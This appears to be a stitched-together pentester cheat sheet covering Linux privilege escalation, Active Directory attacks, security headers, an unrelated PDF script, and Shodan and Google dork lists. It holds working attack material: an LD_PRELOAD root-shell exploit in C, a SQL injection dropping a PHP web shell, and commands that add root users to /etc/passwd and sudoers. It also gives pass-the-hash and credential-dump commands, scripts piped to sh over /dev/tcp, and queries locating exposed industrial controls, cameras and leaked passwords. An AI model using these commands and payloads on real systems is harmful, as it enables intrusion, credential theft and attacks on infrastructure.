sudo -V | grep “Sudo ver”

# check rights
sudo -l
# gtfobins !

# sudo LD_PRELOAD
Defaults        env_keep += LD_PRELOAD

# COMPILE /tmp/exploit.c :

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
	unsetenv("LD_PRELOAD");
	setgid(0);
	setuid(0);
	system("/bin/sh");
}

# with :

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

# Execute any binary with the LD_PRELOAD to spawn a shell : 

sudo LD_PRELOAD=<full_path_to_so_file> <program>
sudo LD_PRELOAD=/tmp/shell.so find

# sudo_inject | https://github.com/nongiach/sudo_inject

# requirements : 
#    Ptrace fully enabled (/proc/sys/kernel/yama/ptrace_scope == 0).
#    Current user must have living process that has a valid sudo token with the same uid.

sudo whatever
sh exploit.sh

# wait
sudo -i
# root !

ls -la ~/ 
ls -la /var/mail /home/*/ /var/spool/mail /home/*/.bash_history /var

# check those files for hashes
cat /etc/passwd
cat /etc/shadow
ls -la /etc/passwd /etc/shadow

# can we write to the .bashsrc file ? if so, can be executed when us logs in
ls -la /root/.bashrc 
ls -la /home/*/.bashrc
locate .bashrc
find / -name .bashrc -xdev 2>/dev/null

# something is running that we can exploit ?
ps aux | grep root

# localhost open ports ?
netstat -antup

# any useful info in the main bash user files ?
cat /etc/profile 
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout

# check for cronjobs
crontab -l 
ls -alh /var/spool/cron
ls -al /etc/ | grep cron; ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

# PSPY to to see commands run by other users, cron jobs, etc. in real time
./pspy > pspy-out.txt

# unmounted file-systems ?
cat /etc/fstab

# If NFS is open, check if the target has any open NFS shares, if it does, then mount it to your filesystem
showmount -e X.X.X.X
mount X.X.X.X:/ /tmp/mount1

# check installed apps + versions + running ?
ls -alh /usr/bin/ /sbin/ /var/cache/apt/archives /var/cache/yum/
dpkg -l
rpm -qa
# Any useful applications installed? 
which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp tmux screen nmap 2>/dev/null

# Files containing passwords
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;

# ssh
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null

# World writable files on the system
find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
find / -perm -2 -type f 2>/dev/null
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null

# writable /etc/passwd
# add :
echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
su - dummy

# writable /etc/sudoers
echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers

# use SUDO without password
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers

# World executable folder
find / -perm -o x -type d 2>/dev/null

# World writable and executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null

# SUID / SGID
find / -perm -u=s -type f 2>/dev/null | xargs ls -l
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null 
find / -perm -g=s -type f 2>/dev/null | xargs ls -l
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null

# Look for any binaries that seem odd. Any binaries running from a users home directory?
# Check the version of any odd binaries and see if there are any public exploits that can be used to gain root

# SUID PATH
echo $PATH
env | grep PATH
print $PATH

/usr/bin/getcap -r  /usr/bin
getcap -r / 2>/dev/null

## Interesting capabilities
getcap openssl /usr/bin/openssl 
openssl=ep
#  the following capabilities can be used in order to upgrade your current privileges.
cap_dac_read_search # read anything
cap_setuid+ep # setuid

# EXAMPLES
# 1
# linpeas /usr/local/bin/ruby = cap_chown+ep 
echo 'File.chown(<User ID>, nil, "/etc/shadow")' > exploit.rb 
ruby exploit.rb 
chmod 777 /etc/shadow
nano /etc/shadow

# 2
# cap_setuid+ep python2.7
python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
sh-5.0# id
uid=0(root) gid=1000(swissky)

# LinkedinMama3 - https://github.com/h0useh3ad/LinkedinMama3
git clone https://github.com/h0useh3ad/LinkedinMama3.git
cd LinkedinMama3/
pip3 install -r requirements.txt

python3 LinkedinMama3.py -k $company_name -e $company_domain -n $email_format -c $linkedin_company_ID

# check if some are pwned - https://github.com/thewhiteh4t/pwnedOrNot
git clone https://github.com/thewhiteh4t/pwnedOrNot.git
cd pwnedOrNot/
chmod +x install.sh
./install.sh

nano config.json # add hibp api key
python3 pwnedornot.py -f mails-list.txt

# Inject cmd parameter
' union select 1,<php_payload>,3,4 into outfile <path> --
' union select 1,'<?php system($_GET["cmd"]); ?>',3,4 intooutfile 'C:\\xampp\\htdocs\\rce.php' --

# Reverse Shell created. Access from outside :
<host>/rce.php?cmd=<command>

# Test :
127.0.0.1/rce.php?cmd=time
# Result : The current time is: 16:22:25.20 Enter the new time: 3 4

# Get domain name
cme smb 10.10.10.10
smbmap -H $dc_ip -u '' -p ''

# Detect SMB on network
responder-RunFinger -i X.X.X.0/24

# Find DC
nslookup -q=srv _ldap._tcp.dc._msdcs.<domain.name>
nslookup -type=srv _ldap._tcp.<domain.name> | grep ldap | cut -d ' ' -f 6 | sed 's/\.$//g'

# Enumerate DC
ldapsearch -h <DC.IP> -x -s base namingcontexts

# Check for null session, if got users go for ASREPRoast with GetNPUsers
ldapsearch -h <DC.IP> -x -b "DC=XX,DC=XX"

# Get hashes with no krb preauth
GetNPUsers.py [Domain Name]/ -dc-ip [Domain Controller IP address] -request
GetNPUsers.py 'DC.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.10

# Get Users List
GetADUsers.py DC.local/ -dc-ip $dc_ip -debug

# Get Users from ldap
windapsearch -U — full — dc-ip $dc_ip

# Get base domain
ldapsearch -x -h $dc_ip -s base namingcontexts

# Get more info from DC
ldapsearch -x -h $dc_ip -b ‘DC=DCNAME,DC=LOCAL’

# User Domain info
Get-ADUser $name

# Forest info
Get-ADForest

# Get all computers in the current domain
Get-NetComputer

# Kerberoasting (hashcat 13100)
GetUserSPNs.py -request -save -dc-ip <IP> domain/user # hashcat 13100

# Bruteforce usernames and passwords with kerbrute
kerbrute.py -d <DC.LOCAL> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

# ASREPRoast (hashcat 18200)
GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# PTH/PTK
# Request ticket
getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
getTGT.py <domain_name>/<user_name>:[password]
# Set ticket
export KRB5CCNAME=<TGT_ccache_file>
# Use it
psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
psexec.py -hashes 'hash' -dc-ip 10.10.10.10 [email protected]
smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

# Enum AD AIO
# https://github.com/CasperGN/ActiveDirectoryEnumeration
python3 -m ade --dc <domain.name> -u <[email protected]> --help
# https://github.com/adrecon/ADRecon from Windows on Domain

# windapsearch
# https://github.com/ropnop/go-windapsearch
windapsearch -d <domain>.<name> -u <user> -p <password> --help

# LDAP
# best tool : ldeep - https://github.com/franc-pentest/ldeep
ldeep ldap -u <USER> -p <PASSWORD> -d <DOMAIN> -s ldap://<DC_IP_OR_LDAP_SERV> all ldap_dump_

# Domain users
ldapsearch -LLL -x -H ldap://<DC.IP> -D "<USER>@<DOMAIN.NAME>" -w '<PASSWORD>' -b dc=<DOMAIN NAME>,dc=<DOMAIN NAME> -o ldif-wrap=no "(&(objectClass=user)(objectCategory=person))" name sAMAccountName userPrincipalName memberOf primaryGroupID adminCount userAccountControl description servicePrincipalName objectSid pwdLastSet lastLogon -E pr=1000/noprompt | tee domain_users.txt

# Domain computers
ldapsearch -LLL -x -H ldap://<DC.IP> -D "<USER>@<DOMAIN.NAME>" -w '<PASSWORD>' -b dc=<DOMAIN NAME>,dc=<DOMAIN NAME> -o ldif-wrap=no "(objectClass=computer)" name dNSHostname memberOf operatingSystem operatingSystemVersion lastLogonTimestamp servicePrincipalName description userAccountControl | tee domain_computers.txt

# Domain groups
ldapsearch -LLL -x -H ldap://<DC.IP> -D "<USER>@<DOMAIN.NAME>" -w '<PASSWORD>' -b dc=<DOMAIN NAME>,dc=<DOMAIN NAME> -o ldif-wrap=no "(objectClass=group)" name sAMAccountName memberOf member description objectSid | tee domain_groups.txt

# RPClient - enumeration users, groups, ...
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c dsr_enumtrustdom
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c enumdomains
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c enumdomusers
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c enumdomgroups

# CME
# Run commands
# can you access sensitive shares ? check for SYSVOL
cme smb <IP> -u <USER> -p '<PASS>' --shares

# PS
cme smb <IP> -u <USER> -p '<PASS>' -X 'Get-Host'
# CMD
cme smb <IP> -u <USER> -p '<PASS>' -x whoami
# PTH
cme smb <IP> -u <USER> -H <NTHASH> -x whoami
# Other methods
cme smb <IP> -u <USER> -p '<PASS>' --exec-method {mmcexec,smbexec,atexec,wmiexec}

# Dumps
# LSASSY
cme smb <IP> -d <DOMAIN> -u <USER> -p <PASS> -M lsassy
# SAM
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --sam
# LSA
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --lsa
# Sessions
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --sessions
# Logged users
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --loggedon-users
# Disks
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --disks
# Users
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --users #Enumerate users
# Groups
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --groups
# Local groups
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --local-groups
# Password policy
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --pass-pol

# install
wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh
curl "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -o lse.sh

# usage
# shows interesting information that should help you to privesc
./lse.sh -l1 
# dump all the information it gathers about the system
./lse.sh -l2

# install
wget "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -O linpeas.sh

# COMMANDS
# Local network
# On the Host
sudo python -m SimpleHTTPServer 80 

# On the Victim
curl $ip/linpeas.sh | sh 

# Without curl
# On the Host
sudo nc -q 5 -lvnp 80 < linpeas.sh 

# On the Victim
cat < /dev/tcp/10.10.10.10/80 | sh 

# USAGE
#all checks - deeper system enumeration, but it takes longer to complete.
./linpeas.sh -a 
# superfast & stealth - This will bypass some time consuming checks. In stealth mode Nothing will be written to the disk.
./linpeas.sh -s
 #Password - Pass a password that will be used with sudo -l and bruteforcing other users
./linpeas.sh -P

# INSTALL
wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py

# python 2.6/2.7
python linuxprivchecker.py -w -o linuxprivchecker.log

# python 3.x
pip install linuxprivchecker

# USAGE
linuxprivchecker -w -o linuxprivchecker.log
# or 
python3 -m linuxprivchecker -w -o linuxprivchecker.log

Security Headers

Source

Tools

SSL/TLS/Ciphers

`testssl.sh`

Security Headers

✅ Good

Strict-Transport-Security (HSTS)

The HTTP Strict-Transport-Security response header (often abbreviated as HSTS) lets a web site tell browsers that it should only be accessed using HTTPS, instead of using HTTP.

Value

Description

Best Synthax

Directives

max-age=<expire-time> The time, in seconds, that the browser should remember that a site is only to be accessed using HTTPS.

includeSubDomains Optional If this optional parameter is specified, this rule applies to all of the site's subdomains as well.

preload Optional See Preloading Strict Transport Security for details. Not part of the specification.

Content Security Policy (CSP)

A Content Security Policy (CSP) requires careful tuning and precise definition of the policy. If enabled, CSP has significant impact on the way browsers render pages (e.g., inline JavaScript disabled by default and must be explicitly allowed in policy). CSP prevents a wide range of attacks, including Cross-site scripting and other cross-site injections.

Directive

Description

Example

X-Frame Options

X-Frame-Options response header improve the protection of web applications against Clickjacking. It declares a policy communicated from a host to the client browser on whether the browser must not display the transmitted content in frames of other web pages.

Value

Description

Example

Referrer-Policy

The Referrer-Policy HTTP header governs which referrer information, sent in the Referer header, should be included with requests made.

Value

Description

Example

X-Content-Type-Options

Setting this header will prevent the browser from interpreting files as something else than declared by the content type in the HTTP headers.

Value

Description

Example

X-Permitted-Cross-Domain-Policies

A cross-domain policy file is an XML document that grants a web client, such as Adobe Flash Player or Adobe Acrobat (though not necessarily limited to these), permission to handle data across domains. When clients request content hosted on a particular source domain and that content makes requests directed towards a domain other than its own, the remote domain needs to host a cross-domain policy file that grants access to the source domain, allowing the client to continue the transaction. Normally a meta-policy is declared in the master policy file, but for those who can’t write to the root directory, they can also declare a meta-policy using the X-Permitted-Cross-Domain-Policies HTTP response header.

Value

Description

Example

❌ Deprecated

No longer recommended. Deprecated.

Though some browsers might still support it, it may have already been removed from the relevant web standards, may be in the process of being dropped, or may only be kept for compatibility purposes.

Be aware that this feature may cease to work at any time.

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

import fitz
from datetime import datetime

def extract_creation_date(pdf_path):
    with fitz.open(pdf_path) as doc:
        try:
            creation_date = doc.metadata.get("creationDate")
            if creation_date:
                creation_date = datetime.strptime(creation_date[2:16], "%Y%m%d%H%M%S")
                return creation_date
            else:
                return None
        except Exception as e:
            print(f"Error extracting creation date from {pdf_path}: {e}")
            return None

if __name__ == "__main__":
    pdf_paths = ["file1.pdf", "file2.pdf", "file3.pdf"]
    creation_dates = []
    for path in pdf_paths:
        creation_date = extract_creation_date(path)
        if creation_date:
            creation_dates.append((path, creation_date))
    
    creation_dates.sort(key=lambda x: x[1])
    print("PDF Creation Dates (in chronological order):")
    for i, (pdf_path, date) in enumerate(creation_dates, start=1):
        print(f"{i}. {pdf_path} - {date}")

Dorks

Working with Dorks

Online Services:

— A continuously expanding catalog of dorks with an integrated search function.
— A search engine featuring a built-in dork builder.
— An online Google dorks builder focused on discovering sensitive pages..
— Google Dorking Usage

Apps

— Automates the search for potentially vulnerable web pages using dorks from the Google Hacking Database.
— A web-based PHP utility for automating Google Dorks usage, cleaning, and saving search results.
— Another tool for automating dork searches, written in Golang.

Google

Google hacking, also named Google Dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using. Google dorking could also be used for OSINT.

Disclaimer: It is highly advised that you use the information you find for legal purposes only. The unauthorized access of information can lead to a criminal proceeding against you. So use Google hacking with care (and written permission).

Tools

metagoofil

Base

Links

Sensitive Directories

Vulnerable Websites

Juicy Files

Database

Shodan

Resources

Basic

port: Search by specific port

net: Search based on an IP/CIDR

hostname: Locate devices by hostname

os: Search by Operating System

city: Locate devices by city

country: Locate devices by country

geo: Locate devices by coordinates

org: Search by organization

before/after: Timeframe delimiter

hash: Search based on banner hash

has_screenshot:true Filter search based on a screenshot being present

title: Search based on text within the title

asn: Search ASN e.g. 'AS12345'

ssl.jarm: Search by JARM fingerprint

Examples

net:

Find devices based on an IP address or /x CIDR. net:210.214.0.0/16

Organization

Autonomous System Number (ASN)

asn:ASxxxx

os:

Find devices based on operating system. os:"windows 7"

port:

Find devices based on open ports. proftpd port:21

before/after:

Find devices before or after between a given time. apache after:22/02/2009 before:14/3/2010

SSL/TLS Certificates

Self signed certificates ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com

Expired certificates ssl.cert.expired:true

ssl.cert.subject.cn:example.com

Device Type

Operating System

Product

Customer Premises Equipment (CPE)

Server

ssh fingerprints

dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0

Dorks

Pulse Secure

http.html:/dana-na

PEM Certificates

http.title:"Index of /" http.html:".pem"

Databases

MySQL

"product:MySQL"

MongoDB

"product:MongoDB" mongodb port:27017

Fully open MongoDBs

"MongoDB Server Information { "metrics":" "Set-Cookie: mongo-express=" "200 OK"

Kibana dashboards without authentication

kibana content-legth:217

elastic

port:9200 json port:"9200" all:elastic

Memcached

"product:Memcached"

CouchDB

"product:CouchDB" port:"5984"+Server: "CouchDB/2.1.0"

PostgreSQL

"port:5432 PostgreSQL"

Riak

"port:8087 Riak"

Redis

"product:Redis"

Cassandra

"product:Cassandra"

Industrial Control Systems

Samsung Electronic Billboards

"Server: Prismview Player"

Gas Station Pump Controllers

"in-tank inventory" port:10001

Fuel Pumps connected to internet:

No auth required to access CLI terminal.\ "privileged command" GET

Automatic License Plate Readers

P372 "ANPR enabled"

Traffic Light Controllers / Red Light Cameras

mikrotik streetlight

Voting Machines in the United States

"voter system serial" country:US

Open ATM:

May allow for ATM Access availability NCR Port:"161"

Telcos Running Cisco Lawful Intercept Wiretaps

"Cisco IOS" "ADVIPSERVICESK9_LI-M"

Prison Pay Phones

"[2J[H Encartele Confidential"

Tesla PowerPack Charging Status

http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2

Electric Vehicle Chargers

"Server: gSOAP/2.8" "Content-Length: 583"

Maritime Satellites

Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!

"Cobham SATCOM" OR ("Sailor" "VSAT")

Submarine Mission Control Dashboards

title:"Slocum Fleet Mission Control"

CAREL PlantVisor Refrigeration Units

"Server: CarelDataServer" "200 Document follows"

Nordex Wind Turbine Farms

http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"

C4 Max Commercial Vehicle GPS Trackers

"[1m[35mWelcome on console"

DICOM Medical X-Ray Machines

Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.

"DICOM Server Response" port:104

GaugeTech Electricity Meters

"Server: EIG Embedded Web Server" "200 Document follows"

Siemens Industrial Automation

"Siemens, SIMATIC" port:161

Siemens HVAC Controllers

"Server: Microsoft-WinCE" "Content-Length: 12581"

Door / Lock Access Controllers

"HID VertX" port:4070

Railroad Management

"log off" "select the appropriate"

Tesla Powerpack charging Status:

Helps to find the charging status of tesla powerpack. http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2

XZERES Wind Turbine

title:"xzeres wind"

PIPS Automated License Plate Reader

"html:"PIPS Technology ALPR Processors""

Modbus

"port:502"

Niagara Fox

"port:1911,4911 product:Niagara"

GE-SRTP

"port:18245,18246 product:"general electric""

MELSEC-Q

"port:5006,5007 product:mitsubishi"

CODESYS

"port:2455 operating system"

"port:102"

BACnet

"port:47808"

HART-IP

"port:5094 hart-ip"

Omron FINS

"port:9600 response code"

IEC 60870-5-104

"port:2404 asdu address"

DNP3

"port:20000 source address"

EtherNet/IP

"port:44818"

PCWorx

"port:1962 PLC"

Crimson v3.0

"port:789 product:"Red Lion Controls"

ProConOS

"port:20547 PLC"

Remote Desktop

Unprotected VNC

"authentication disabled" port:5900,5901 "authentication disabled" "RFB 003.008"

Windows RDP

99.99% are secured by a secondary Windows login screen.

"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"

Network Infrastructure

CobaltStrike Servers

product:"cobalt strike team server" ssl.cert.serial:146473198 - default certificate serial number ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1

Hacked routers:

Routers which got compromised\ hacked-router-help-sos

Redis open instances

product:"Redis key-value store"

Citrix:

Find Citrix Gateway.\ title:"citrix gateway"

Weave Scope Dashboards

Command-line access inside Kubernetes pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.

title:"Weave Scope" http.favicon.hash:567176827

MongoDB

Older versions were insecure by default. Very scary.

"MongoDB Server Information" port:27017 -authentication

Mongo Express Web GUI

Like the infamous phpMyAdmin but for MongoDB.

"Set-Cookie: mongo-express=" "200 OK"

Jenkins CI

"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"

Jenkins:

Jenkins Unrestricted Dashboard x-jenkins 200

Docker APIs

"Docker Containers:" port:2375

Docker Private Registries

"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab

Pi-hole Open DNS Servers

"dnsmasq-pi-hole" "Recursion: enabled"

Already Logged-In as root via Telnet

"root@" port:23 -login -password -name -Session

Telnet Access:

NO password required for telnet access.\ port:23 console gateway

Polycom video-conference system no-auth shell

"polycom command shell"

NPort serial-to-eth / MoCA devices without password

nport -keyin port:23

Android Root Bridges

A tangential result of Google's sloppy fractured update approach. 🙄 More information here.

"Android Debug Bridge" "Device" port:5555

Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords

Lantronix password port:30718 -secured

Citrix Virtual Apps

"Citrix Applications:" port:1604

Cisco Smart Install

Vulnerable (kind of "by design," but especially when exposed).

"smart install client active"

PBX IP Phone Gateways

PBX "gateway console" -password port:23

Polycom Video Conferencing

http.title:"- Polycom" "Server: lighttpd" "Polycom Command Shell" -failed port:23

Telnet Configuration:

"Polycom Command Shell" -failed port:23

Example: Polycom Video Conferencing

Bomgar Help Desk Portal

"Server: Bomgar" "200 OK"

Intel Active Management CVE-2017-5689

"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995 ”Active Management Technology”

HP iLO 4 CVE-2017-12542

HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900

Lantronix ethernet adapter’s admin interface without password

"Press Enter for Setup Mode port:9999"

Wifi Passwords:

Helps to find the cleartext wifi passwords in Shodan. html:"def_wirelesspassword"

Misconfigured Wordpress Sites:

The wp-config.php if accessed can give out the database credentials. http.html:"* The wp-config.php creation script uses this file"

Outlook Web Access:

Exchange 2007

"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"

Exchange 2010

"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392

Exchange 2013 / 2016

"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"

Lync / Skype for Business

"X-MS-Server-Fqdn"

Network Attached Storage (NAS)

SMB (Samba) File Shares

Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.

"Authentication: disabled" port:445

Specifically domain controllers:

"Authentication: disabled" NETLOGON SYSVOL -unix port:445

Concerning default network shares of QuickBooks files:

"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445

FTP Servers with Anonymous Login

"220" "230 Login successful." port:21

Iomega / LenovoEMC NAS Drives

"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"

Buffalo TeraStation NAS Drives

Redirecting sencha port:9000

Logitech Media Servers

"Server: Logitech Media Server" "200 OK"

Example: Logitech Media Servers

Plex Media Servers

"X-Plex-Protocol" "200 OK" port:32400

Tautulli / PlexPy Dashboards

"CherryPy/5.1.0" "/home"

Home router attached USB

"IPC$ all storage devices"

Webcams

Generic camera search

title:camera

Webcams with screenshots

webcam has_screenshot:true

D-Link webcams

"d-Link Internet Camera, 200 OK"

Hipcam

"Hipcam RealServer/V1.0"

Yawcams

"Server: yawcam" "Mime-Type: text/html"

webcamXP/webcam7

("webcam 7" OR "webcamXP") http.component:"mootools" -401

Android IP Webcam Server

"Server: IP Webcam Server" "200 OK"

Security DVRs

html:"DVR_H264 ActiveX"

Surveillance Cams:

With username:admin and password: :P\ NETSurveillance uc-httpd Server: uc-httpd 1.0.0

Printers & Copiers:

HP Printers

"Serial Number:" "Built:" "Server: HP HTTP"

Xerox Copiers/Printers

ssl:"Xerox Generic Root"

Epson Printers

"SERVER: EPSON_Linux UPnP" "200 OK"

"Server: EPSON-HTTP" "200 OK"

Canon Printers

"Server: KS_HTTP" "200 OK"

"Server: CANON HTTP Server"

Home Devices

Yamaha Stereos

"Server: AV_Receiver" "HTTP/1.1 406"

Apple AirPlay Receivers

Apple TVs, HomePods, etc.

"\x08_airplay" port:5353

Chromecasts / Smart TVs

"Chromecast:" port:8008

Crestron Smart Home Controllers

"Model: PYNG-HUB"

Random Stuff

Calibre libraries

"Server: calibre" http.status:200 http.title:calibre

OctoPrint 3D Printer Controllers

title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944

Ethereum Miners

"ETH - Total speed"

Apache Directory Listings

Substitute .pem with any extension or a filename like phpinfo.php.

http.title:"Index of /" http.html:".pem"

Misconfigured WordPress

Exposed wp-config.php files containing database credentials.

http.html:"* The wp-config.php creation script uses this file"

Too Many Minecraft Servers

"Minecraft Server" "protocol 340" port:25565

Literally Everything in North Korea

net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24

Twitter / GitHub

# install
git clone https://github.com/opsdisk/metagoofil
cd metagoofil
pip install -r requirements.txt

# usage
python3 metagoofil.py -d domain.com -t doc -l 50 -n 50 -o /tmp/result -f /tmp/result/result.html -u

intitle:"index of" "*.php"
intitle:"index of" "*.py"
intitle:"index of" "*.sh"
intitle:"index of" "schema.sql"
inurl: database

inurl:php?=id1
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num= andinurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=

inurl:admin filetype:xls
intitle:"index of" "/mysql"
site:.edu intext:"index of" "payroll"
inurl:edu “login”

intext:”budget approved”) inurl:confidential
ext:inc "pwd=" "UID="
ext:ini intext:env.ini
ext:ini Version=... password
ext:ini Version=4.0.0.4 password
ext:ini eudora.ini
ext:ini intext:env.ini
ext:log "Software: Microsoft Internet Information Services *.*"
ext:log "Software: Microsoft Internet Information
ext:log "Software: Microsoft Internet Information Services *.*"
ext:log "Software: Microsoft Internet Information Services *.*"
ext:mdb   inurl:*.mdb inurl:fpdb shop.mdb
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
filetype:SWF SWF
filetype:TXT TXT
filetype:XLS XLS
filetype:asp   DBQ=" * Server.MapPath("*.mdb")
filetype:asp "Custom Error Message" Category Source
filetype:asp + "[ODBC SQL"
filetype:asp DBQ=" * Server.MapPath("*.mdb")
filetype:asp DBQ=" * Server.MapPath("*.mdb") 
filetype:asp “Custom Error Message” Category Source
filetype:bak createobject sa
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:bak inurl:"htaccess|passwd|shadow|htusers" 
filetype:conf inurl:firewall -intitle:cvs 
filetype:conf inurl:proftpd. PROFTP FTP server configuration file reveals
filetype:dat "password.dat
filetype:dat "password.dat" 
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To" 
filetype:eml eml +intext:”Subject” +intext:”From” +intext:”To”
filetype:inc dbconn 
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect 
filetype:log inurl:"password.log"
filetype:log username putty PUTTY SSH client logs can reveal usernames
filetype:log “PHP Parse error” | “PHP Warning” | “PHP Error”
filetype:mdb inurl:users.mdb
filetype:ora ora
filetype:ora tnsnames
filetype:pass pass intext:userid
filetype:pdf "Assessment Report" nessus
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pst inurl:"outlook.pst"
filetype:pst pst -from -to -date
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword" 
filetype:reg reg +intext:â? WINVNC3â?
filetype:reg reg +intext:”defaultusername” +intext:”defaultpassword”
filetype:reg reg HKEY_ Windows Registry exports can reveal
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" | "values * encrypt")
filetype:sql ("passwd values" | "password values" | "pass values" ) 
filetype:sql ("values * MD" | "values * password" | "values * encrypt") 
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:sql password 
filetype:sql “insert into” (pass|passwd|password)
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:url +inurl:"ftp://" +inurl:";@" 
filetype:url +inurl:”ftp://” +inurl:”;@”
filetype:xls inurl:"email.xls"
filetype:xls username password email
index of: intext:Gallery in Configuration mode
index.of passlist
index.of perform.ini mIRC IRC ini file can list IRC usernames and
index.of.dcim 
index.of.password 
intext:" -FrontPage-" ext:pwd inurl:(service | authors | administrators | users)
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
